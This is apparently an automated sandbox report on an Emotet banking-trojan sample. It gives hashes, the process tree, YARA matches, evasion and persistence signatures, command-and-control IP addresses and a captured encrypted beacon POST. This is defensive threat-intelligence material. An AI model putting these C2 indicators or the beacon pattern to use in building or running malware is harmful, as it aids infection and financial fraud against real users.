Loading ...

Play interactive tourEdit tour

Analysis Report 9fdUNaHzLv

Overview

General Information

Sample Name:9fdUNaHzLv (renamed file extension from none to exe)
Analysis ID:380921
MD5:ecbc4b40dcfec4ed1b2647b217da0441
SHA1:e08eb07c69d8fc8e75927597767288a21d6ed7f6
SHA256:878d5137e0c9a072c83c596b4e80f2aa52a8580ef214e5ba0d59daa5036a92f8
Infos:

Most interesting Screenshot:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected Emotet
Changes security center settings (notifications, updates, antivirus, firewall)
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after checking mutex)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for sample
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

Startup

  • System is w10x64
  • 9fdUNaHzLv.exe (PID: 5816 cmdline: 'C:\Users\user\Desktop\9fdUNaHzLv.exe' MD5: ECBC4B40DCFEC4ED1B2647B217DA0441)
    • 9fdUNaHzLv.exe (PID: 3440 cmdline: C:\Users\user\Desktop\9fdUNaHzLv.exe MD5: ECBC4B40DCFEC4ED1B2647B217DA0441)
  • providernvidia.exe (PID: 2212 cmdline: C:\Windows\SysWOW64\providernvidia.exe MD5: ECBC4B40DCFEC4ED1B2647B217DA0441)
    • providernvidia.exe (PID: 5820 cmdline: C:\Windows\SysWOW64\providernvidia.exe MD5: ECBC4B40DCFEC4ED1B2647B217DA0441)
  • svchost.exe (PID: 4120 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6076 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1200 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6248 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6284 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6348 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6388 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6468 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 6556 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 6576 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 6692 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 5152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6724 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
9fdUNaHzLv.exeJoeSecurity_EmotetYara detected EmotetJoe Security
    9fdUNaHzLv.exeEmotetEmotet Payloadkevoreilly
    • 0x16f0:$snippet1: FF 15 F8 C1 40 00 83 C4 0C 68 40 00 00 F0 6A 18
    • 0x1732:$snippet2: 6A 13 68 01 00 01 00 FF 15 C4 C0 40 00 85 C0

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000006.00000000.203362622.0000000000D11000.00000020.00020000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000002.00000002.204527300.0000000000D11000.00000020.00020000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000006.00000002.463908181.0000000000D11000.00000020.00020000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          00000005.00000002.203725030.0000000000D11000.00000020.00020000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
            00000005.00000000.202520329.0000000000D11000.00000020.00020000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
              Click to see the 3 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.0.9fdUNaHzLv.exe.d10000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                0.0.9fdUNaHzLv.exe.d10000.0.unpackEmotetEmotet Payloadkevoreilly
                • 0x16f0:$snippet1: FF 15 F8 C1 D1 00 83 C4 0C 68 40 00 00 F0 6A 18
                • 0x1732:$snippet2: 6A 13 68 01 00 01 00 FF 15 C4 C0 D1 00 85 C0
                5.0.providernvidia.exe.d10000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                  5.0.providernvidia.exe.d10000.0.unpackEmotetEmotet Payloadkevoreilly
                  • 0x16f0:$snippet1: FF 15 F8 C1 D1 00 83 C4 0C 68 40 00 00 F0 6A 18
                  • 0x1732:$snippet2: 6A 13 68 01 00 01 00 FF 15 C4 C0 D1 00 85 C0
                  6.2.providernvidia.exe.d10000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                    Click to see the 11 entries

                    Sigma Overview

                    No Sigma rule has matched

                    Signature Overview

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection:

                    barindex
                    Antivirus / Scanner detection for submitted sampleShow sources
                    Source: 9fdUNaHzLv.exeAvira: detected
                    Multi AV Scanner detection for domain / URLShow sources
                    Source: http://173.230.145.224:8080/Virustotal: Detection: 6%Perma Link
                    Multi AV Scanner detection for submitted fileShow sources
                    Source: 9fdUNaHzLv.exeVirustotal: Detection: 84%Perma Link
                    Source: 9fdUNaHzLv.exeReversingLabs: Detection: 96%
                    Machine Learning detection for sampleShow sources
                    Source: 9fdUNaHzLv.exeJoe Sandbox ML: detected
                    Source: 9fdUNaHzLv.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                    Source: 9fdUNaHzLv.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Source: global trafficTCP traffic: 192.168.2.3:49726 -> 193.169.54.12:8080
                    Source: global trafficTCP traffic: 192.168.2.3:49738 -> 173.230.145.224:8080
                    Source: Joe Sandbox ViewIP Address: 193.169.54.12 193.169.54.12
                    Source: Joe Sandbox ViewIP Address: 193.169.54.12 193.169.54.12
                    Source: Joe Sandbox ViewIP Address: 173.230.145.224 173.230.145.224
                    Source: Joe Sandbox ViewIP Address: 173.230.145.224 173.230.145.224
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 79.172.249.82:443Content-Length: 436Connection: Keep-AliveCache-Control: no-cacheData Raw: 46 d3 2b 54 ae fc d6 3a 76 c4 9e 73 48 fe 49 d5 f8 b4 aa 2d 29 2b 5f 2f 51 43 49 d6 af b1 ee d1 66 a4 76 ca 80 7e 7d ea e5 1f b8 54 d1 f6 a8 c4 fa a1 57 39 fb 61 52 4d 96 65 1c a6 e5 99 49 14 ec 0a 71 5f e2 5f 33 d0 20 69 8c 9f 5a 32 77 74 73 7c c9 2f 93 bb 77 57 92 b1 7c 99 c3 87 db a5 21 ba d8 2c 2a d2 42 78 56 49 b5 f0 29 02 0c 0b 03 48 d2 8c 0b c9 96 0c 72 db 03 60 c2 fd 84 b6 1e f7 81 47 a2 a2 9f d7 df 4b 9b f8 81 27 f6 3c b6 1e 86 50 82 d3 0f c4 89 b9 d3 fa 11 b7 88 64 d4 13 72 ae 99 42 2a 33 00 d6 11 d6 e3 8f e5 c0 42 f8 4a 5e 4a 03 84 cb 86 dd ca 23 08 65 6d c2 80 b0 5c 78 7a d1 b5 7c 3b a0 03 2f 7e 46 84 fe 20 39 80 e0 81 78 aa bd 76 5f e9 ba 44 da d9 74 a3 d7 62 aa d7 3f 80 3d 8c b4 7a 00 be a8 d2 d3 f9 fb ab 00 f1 69 ea de 4c 42 14 d6 2b ca 76 bc b0 81 d7 e3 64 e6 af 00 43 c2 fa b0 a0 b9 da 47 86 d2 c5 cd 8c 15 59 05 75 39 6e e0 88 2c 4c f3 98 f9 d4 2c cb 9b 5f e7 88 4c 6d 67 98 57 b5 24 85 66 8e 2b 85 05 b1 48 6d e2 d8 2c 6b 5b df 78 26 b4 bf 71 e3 0f db 5f 38 ac 75 b5 12 43 ee 84 ec fb c3 ad 2e ba 07 ba 93 15 f2 d5 a8 d1 7c e9 a8 80 75 3f 62 31 6b 10 eb 5e 0e 5c b6 7e 5f 93 85 d6 88 ce 51 db 56 aa d8 17 1c e6 e8 4d 44 7a ed b0 f6 cf 34 da df 30 cb 84 62 00 1e dc 3c 10 8b a2 b9 0b ca 86 99 83 56 f0 9e af b0 6b 27 04 50 79 50 41 39 0b 87 d2 d8 cb 92 28 81 56 30 24 78 94 30 48 Data Ascii: F+T:vsHI-)+_/QCIfv~}TW9aRMeIq__3 iZ2wts|/wW|!,*BxVI)Hr`GK'<PdrB*3BJ^J#em\xz|;/~F 9xv_Dtb?=ziLB+vdCGYu9n,L,_LmgW$f+Hm,k[x&q_8uC.|u?b1k^\~_QVMDz40b<Vk'PyPA9(V0$x0H
                    Source: unknownTCP traffic detected without corresponding DNS query: 79.172.249.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 79.172.249.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 79.172.249.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 79.172.249.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 79.172.249.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 79.172.249.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.169.54.12
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.169.54.12
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.169.54.12
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.230.145.224
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.230.145.224
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.230.145.224
                    Source: unknownHTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 79.172.249.82:443Content-Length: 436Connection: Keep-AliveCache-Control: no-cacheData Raw: 46 d3 2b 54 ae fc d6 3a 76 c4 9e 73 48 fe 49 d5 f8 b4 aa 2d 29 2b 5f 2f 51 43 49 d6 af b1 ee d1 66 a4 76 ca 80 7e 7d ea e5 1f b8 54 d1 f6 a8 c4 fa a1 57 39 fb 61 52 4d 96 65 1c a6 e5 99 49 14 ec 0a 71 5f e2 5f 33 d0 20 69 8c 9f 5a 32 77 74 73 7c c9 2f 93 bb 77 57 92 b1 7c 99 c3 87 db a5 21 ba d8 2c 2a d2 42 78 56 49 b5 f0 29 02 0c 0b 03 48 d2 8c 0b c9 96 0c 72 db 03 60 c2 fd 84 b6 1e f7 81 47 a2 a2 9f d7 df 4b 9b f8 81 27 f6 3c b6 1e 86 50 82 d3 0f c4 89 b9 d3 fa 11 b7 88 64 d4 13 72 ae 99 42 2a 33 00 d6 11 d6 e3 8f e5 c0 42 f8 4a 5e 4a 03 84 cb 86 dd ca 23 08 65 6d c2 80 b0 5c 78 7a d1 b5 7c 3b a0 03 2f 7e 46 84 fe 20 39 80 e0 81 78 aa bd 76 5f e9 ba 44 da d9 74 a3 d7 62 aa d7 3f 80 3d 8c b4 7a 00 be a8 d2 d3 f9 fb ab 00 f1 69 ea de 4c 42 14 d6 2b ca 76 bc b0 81 d7 e3 64 e6 af 00 43 c2 fa b0 a0 b9 da 47 86 d2 c5 cd 8c 15 59 05 75 39 6e e0 88 2c 4c f3 98 f9 d4 2c cb 9b 5f e7 88 4c 6d 67 98 57 b5 24 85 66 8e 2b 85 05 b1 48 6d e2 d8 2c 6b 5b df 78 26 b4 bf 71 e3 0f db 5f 38 ac 75 b5 12 43 ee 84 ec fb c3 ad 2e ba 07 ba 93 15 f2 d5 a8 d1 7c e9 a8 80 75 3f 62 31 6b 10 eb 5e 0e 5c b6 7e 5f 93 85 d6 88 ce 51 db 56 aa d8 17 1c e6 e8 4d 44 7a ed b0 f6 cf 34 da df 30 cb 84 62 00 1e dc 3c 10 8b a2 b9 0b ca 86 99 83 56 f0 9e af b0 6b 27 04 50 79 50 41 39 0b 87 d2 d8 cb 92 28 81 56 30 24 78 94 30 48 Data Ascii: F+T:vsHI-)+_/QCIfv~}TW9aRMeIq__3 iZ2wts|/wW|!,*BxVI)Hr`GK'<PdrB*3BJ^J#em\xz|;/~F 9xv_Dtb?=ziLB+vdCGYu9n,L,_LmgW$f+Hm,k[x&q_8uC.|u?b1k^\~_QVMDz40b<Vk'PyPA9(V0$x0H
                    Source: providernvidia.exe, 00000006.00000002.463740202.000000000079C000.00000004.00000020.sdmpString found in binary or memory: http://173.230.145.224:8080/
                    Source: providernvidia.exe, 00000006.00000002.463740202.000000000079C000.00000004.00000020.sdmpString found in binary or memory: http://173.230.145.224:8080/_
                    Source: providernvidia.exe, 00000006.00000003.279590439.000000000079C000.00000004.00000001.sdmpString found in binary or memory: http://193.169.54.12:8080/
                    Source: providernvidia.exe, 00000006.00000002.463769550.00000000007A7000.00000004.00000020.sdmpString found in binary or memory: http://193.169.54.12:8080/3
                    Source: providernvidia.exe, 00000006.00000003.279590439.000000000079C000.00000004.00000001.sdmpString found in binary or memory: http://193.169.54.12:8080/Z
                    Source: providernvidia.exe, 00000006.00000002.463740202.000000000079C000.00000004.00000020.sdmpString found in binary or memory: http://79.172.249.82:443/
                    Source: providernvidia.exe, 00000006.00000002.463740202.000000000079C000.00000004.00000020.sdmpString found in binary or memory: http://79.172.249.82:443/1
                    Source: svchost.exe, 0000000A.00000002.465953510.000002A4BBE0C000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                    Source: svchost.exe, 0000000A.00000002.465953510.000002A4BBE0C000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                    Source: svchost.exe, 0000000A.00000002.465953510.000002A4BBE0C000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                    Source: svchost.exe, 0000000A.00000002.465483390.000002A4BBD00000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                    Source: svchost.exe, 00000011.00000002.309051305.000001E921613000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
                    Source: svchost.exe, 0000000E.00000002.463912336.000001E2FBC3E000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                    Source: svchost.exe, 0000000E.00000002.463912336.000001E2FBC3E000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
                    Source: svchost.exe, 0000000E.00000002.463912336.000001E2FBC3E000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
                    Source: svchost.exe, 00000011.00000003.308735974.000001E921660000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                    Source: svchost.exe, 0000000E.00000002.463912336.000001E2FBC3E000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                    Source: svchost.exe, 0000000E.00000002.463912336.000001E2FBC3E000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                    Source: svchost.exe, 00000011.00000003.308755545.000001E921649000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                    Source: svchost.exe, 00000011.00000003.308735974.000001E921660000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                    Source: svchost.exe, 00000011.00000002.309100617.000001E92163D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                    Source: svchost.exe, 00000011.00000003.308735974.000001E921660000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                    Source: svchost.exe, 00000011.00000003.308742105.000001E92164B000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                    Source: svchost.exe, 00000011.00000003.287007711.000001E921630000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
                    Source: svchost.exe, 00000011.00000003.308735974.000001E921660000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                    Source: svchost.exe, 00000011.00000002.309100617.000001E92163D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                    Source: svchost.exe, 00000011.00000003.308735974.000001E921660000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                    Source: svchost.exe, 00000011.00000003.308735974.000001E921660000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                    Source: svchost.exe, 00000011.00000003.308735974.000001E921660000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                    Source: svchost.exe, 00000011.00000003.287007711.000001E921630000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
                    Source: svchost.exe, 00000011.00000002.309109992.000001E921642000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                    Source: svchost.exe, 00000011.00000002.309109992.000001E921642000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                    Source: svchost.exe, 00000011.00000003.308735974.000001E921660000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                    Source: svchost.exe, 00000011.00000003.308773313.000001E921640000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                    Source: svchost.exe, 00000011.00000003.308755545.000001E921649000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                    Source: svchost.exe, 00000011.00000003.308742105.000001E92164B000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                    Source: svchost.exe, 00000011.00000003.308742105.000001E92164B000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                    Source: svchost.exe, 00000011.00000003.308724185.000001E921662000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
                    Source: svchost.exe, 00000011.00000003.308735974.000001E921660000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                    Source: svchost.exe, 00000011.00000003.287007711.000001E921630000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.309100617.000001E92163D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                    Source: svchost.exe, 00000011.00000003.287007711.000001E921630000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                    Source: svchost.exe, 00000011.00000002.309100617.000001E92163D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                    Source: svchost.exe, 00000011.00000002.309051305.000001E921613000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.309100617.000001E92163D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                    Source: svchost.exe, 00000011.00000003.308773313.000001E921640000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                    Source: svchost.exe, 00000011.00000003.308773313.000001E921640000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                    Source: svchost.exe, 00000011.00000003.287007711.000001E921630000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                    Source: svchost.exe, 00000011.00000002.309091104.000001E921639000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                    Source: svchost.exe, 00000011.00000003.308742105.000001E92164B000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                    Source: 9fdUNaHzLv.exe, 00000000.00000002.196957623.000000000145A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                    E-Banking Fraud:

                    barindex
                    Yara detected EmotetShow sources
                    Source: Yara matchFile source: 9fdUNaHzLv.exe, type: SAMPLE
                    Source: Yara matchFile source: 00000006.00000000.203362622.0000000000D11000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.204527300.0000000000D11000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.463908181.0000000000D11000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.203725030.0000000000D11000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.202520329.0000000000D11000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.196824116.0000000000D11000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.194691427.0000000000D11000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000000.195820099.0000000000D11000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0.0.9fdUNaHzLv.exe.d10000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.providernvidia.exe.d10000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.providernvidia.exe.d10000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.9fdUNaHzLv.exe.d10000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.providernvidia.exe.d10000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.9fdUNaHzLv.exe.d10000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.0.providernvidia.exe.d10000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.9fdUNaHzLv.exe.d10000.0.unpack, type: UNPACKEDPE

                    System Summary:

                    barindex
                    Malicious sample detected (through community Yara rule)Show sources
                    Source: 9fdUNaHzLv.exe, type: SAMPLEMatched rule: Emotet Payload Author: kevoreilly
                    Source: 0.0.9fdUNaHzLv.exe.d10000.0.unpack, type: UNPACKEDPEMatched rule: Emotet Payload Author: kevoreilly
                    Source: 5.0.providernvidia.exe.d10000.0.unpack, type: UNPACKEDPEMatched rule: Emotet Payload Author: kevoreilly
                    Source: 6.2.providernvidia.exe.d10000.1.unpack, type: UNPACKEDPEMatched rule: Emotet Payload Author: kevoreilly
                    Source: 0.2.9fdUNaHzLv.exe.d10000.0.unpack, type: UNPACKEDPEMatched rule: Emotet Payload Author: kevoreilly
                    Source: 5.2.providernvidia.exe.d10000.0.unpack, type: UNPACKEDPEMatched rule: Emotet Payload Author: kevoreilly
                    Source: 2.0.9fdUNaHzLv.exe.d10000.0.unpack, type: UNPACKEDPEMatched rule: Emotet Payload Author: kevoreilly
                    Source: 6.0.providernvidia.exe.d10000.0.unpack, type: UNPACKEDPEMatched rule: Emotet Payload Author: kevoreilly
                    Source: 2.2.9fdUNaHzLv.exe.d10000.0.unpack, type: UNPACKEDPEMatched rule: Emotet Payload Author: kevoreilly
                    Source: C:\Windows\SysWOW64\providernvidia.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCacheJump to behavior
                    Source: C:\Users\user\Desktop\9fdUNaHzLv.exeFile deleted: C:\Windows\SysWOW64\providernvidia.exe:Zone.IdentifierJump to behavior
                    Source: C:\Users\user\Desktop\9fdUNaHzLv.exeCode function: 0_2_00D177F00_2_00D177F0
                    Source: C:\Users\user\Desktop\9fdUNaHzLv.exeCode function: 0_2_00D16E700_2_00D16E70
                    Source: 9fdUNaHzLv.exe, 00000002.00000002.204591346.0000000000FB0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs 9fdUNaHzLv.exe
                    Source: 9fdUNaHzLv.exe, 00000002.00000002.204591346.0000000000FB0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs 9fdUNaHzLv.exe
                    Source: 9fdUNaHzLv.exe, 00000002.00000002.207049764.0000000002C70000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs 9fdUNaHzLv.exe
                    Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dllJump to behavior
                    Source: 9fdUNaHzLv.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                    Source: 9fdUNaHzLv.exe, type: SAMPLEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
                    Source: 0.0.9fdUNaHzLv.exe.d10000.0.unpack, type: UNPACKEDPEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
                    Source: 5.0.providernvidia.exe.d10000.0.unpack, type: UNPACKEDPEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
                    Source: 6.2.providernvidia.exe.d10000.1.unpack, type: UNPACKEDPEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
                    Source: 0.2.9fdUNaHzLv.exe.d10000.0.unpack, type: UNPACKEDPEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
                    Source: 5.2.providernvidia.exe.d10000.0.unpack, type: UNPACKEDPEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
                    Source: 2.0.9fdUNaHzLv.exe.d10000.0.unpack, type: UNPACKEDPEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
                    Source: 6.0.providernvidia.exe.d10000.0.unpack, type: UNPACKEDPEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
                    Source: 2.2.9fdUNaHzLv.exe.d10000.0.unpack, type: UNPACKEDPEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
                    Source: classification engineClassification label: mal100.troj.evad.winEXE@20/8@0/5
                    Source: C:\Users\user\Desktop\9fdUNaHzLv.exeCode function: 0_2_00D12110 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00D12110
                    Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etlJump to behavior
                    Source: C:\Users\user\Desktop\9fdUNaHzLv.exeMutant created: \Sessions\1\BaseNamedObjects\M3E49A257
                    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5152:120:WilError_01
                    Source: C:\Windows\SysWOW64\providernvidia.exeMutant created: \BaseNamedObjects\Global\I6F6A638B
                    Source: C:\Users\user\Desktop\9fdUNaHzLv.exeMutant created: \Sessions\1\BaseNamedObjects\Global\M6F6A638B
                    Source: C:\Windows\SysWOW64\providernvidia.exeMutant created: \BaseNamedObjects\M7EB4FDDE
                    Source: C:\Users\user\Desktop\9fdUNaHzLv.exeMutant created: \Sessions\1\BaseNamedObjects\Global\I6F6A638B
